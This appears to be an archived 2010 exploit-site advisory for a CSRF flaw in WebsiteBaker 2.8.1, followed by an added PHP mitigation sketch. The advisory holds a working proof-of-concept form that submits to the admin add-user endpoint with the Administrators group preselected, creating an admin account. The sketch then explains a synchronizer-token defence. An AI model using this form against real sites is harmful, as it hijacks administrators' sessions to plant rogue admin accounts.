WebsiteBaker 2.8.1 CSRF Vulnerability
Posted on 19 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=windows-1251'>
<title>WebsiteBaker 2.8.1 CSRF Vulnerability</title>
<link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'>
<link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'>
</head>
<body>
<pre>
=====================================
WebsiteBaker 2.8.1 CSRF Vulnerability
=====================================

# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security

<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user" action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />
<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
  <td width="150">Username:</td>
  <td class="value_input">
    <input type="text" name="username_08y7h65u" maxlength="30" value="" />
  </td>
</tr>
<tr>
  <td>Password:</td>
  <td class="value_input">
    <input type="password" name="password" maxlength="30" />
  </td>
</tr>
<tr>
  <td>Re-type Password:</td>
  <td class="value_input">
    <input type="password" name="password2" maxlength="30" />
  </td>
</tr>
<tr style="display:none;">
  <td> </td>
  <td style="font-size: 10px;">
    Please note: You should only enter values in the above fields if you wish to change this users password
  </td>
</tr>
<tr>
  <td>Display Name:</td>
  <td class="value_input">
    <input type="text" name="display_name" maxlength="255" value="" />
  </td>
</tr>
<tr>
  <td>Email:</td>
  <td class="value_input">
    <input type="text" name="email" maxlength="255" value="" />
  </td>
</tr>
<tr style="">
  <td>Home Folder:</td>
  <td class="value_input">
    <select name="home_folder">
      <option value="">None</option>
      <option value="/testbild" >/media/testbild</option>
    </select>
  </td>
</tr>
<tr>
  <td>Group:</td>
  <td class="value_input">
    <select name="groups[]" multiple="multiple" size="5">
      <option value="1" >Administrators</option>
    </select>
  </td>
</tr>
<tr>
  <td> </td>
  <td>
    <input type="radio" name="active[]" id="active" value="1" checked="checked" />
    <label for="active">Active</label>
    <input type="radio" name="active[]" id="disabled" value="0" />
    <label for="disabled">Disabled</label>
  </td>
</tr>
<tr>
  <td> </td>
  <td>
    <input type="submit" name="submit" value="Add" />
    <input type="reset" name="reset" value="Reset" />
  </td>
</tr>
</table>
</form>
<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]
</pre>
</body>
</html>
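
Mitigation sketch for the issue reported above: the advisory's form is accepted by admin/users/add.php when submitted from a third-party page, which a synchronizer token bound to the administrator's session prevents. This is an added example, not WebsiteBaker's code and not part of the advisory; the helper names, the csrf_token field name, the 30-minute lifetime and the use of PHP 7 or later are assumptions.

```php
<?php
// Added example: synchronizer-token guard for a state-changing admin handler
// such as admin/users/add.php. Helper names are hypothetical, not WebsiteBaker's API.

const CSRF_FIELD = 'csrf_token';  // assumed hidden field name
const CSRF_TTL   = 1800;          // assumed token lifetime in seconds

/** Issue a fresh token for this session; echo the result inside the add-user form. */
function csrf_field(): string
{
    $token = bin2hex(random_bytes(32));  // 256 bits from the OS CSPRNG
    $_SESSION['csrf'] = ['value' => $token, 'issued' => time()];
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $token . '" />';
}

/** True only for a POST carrying the unexpired token stored in this session. */
function csrf_check(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;  // state changes are never accepted over GET
    }
    $stored = $session['csrf'] ?? null;
    $sent   = $post[CSRF_FIELD] ?? '';
    if (!is_array($stored) || !is_string($sent) || $sent === '') {
        return false;  // no token issued, or none submitted (the cross-site case)
    }
    if (time() - (int) ($stored['issued'] ?? 0) > CSRF_TTL) {
        return false;  // token expired
    }
    // Constant-time comparison avoids leaking the token through timing.
    return hash_equals((string) ($stored['value'] ?? ''), $sent);
}

// Guard placed at the top of the handler, before any account is created.
session_start();
if (!csrf_check($_SERVER['REQUEST_METHOD'] ?? '', $_POST, $_SESSION)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
unset($_SESSION['csrf']);  // single use: a replayed submission fails
// ... existing permission checks and user creation continue here ...
```

A form hosted on another origin cannot read the administrator's session token, so its submission reaches the 403 branch even though the browser attaches the session cookie.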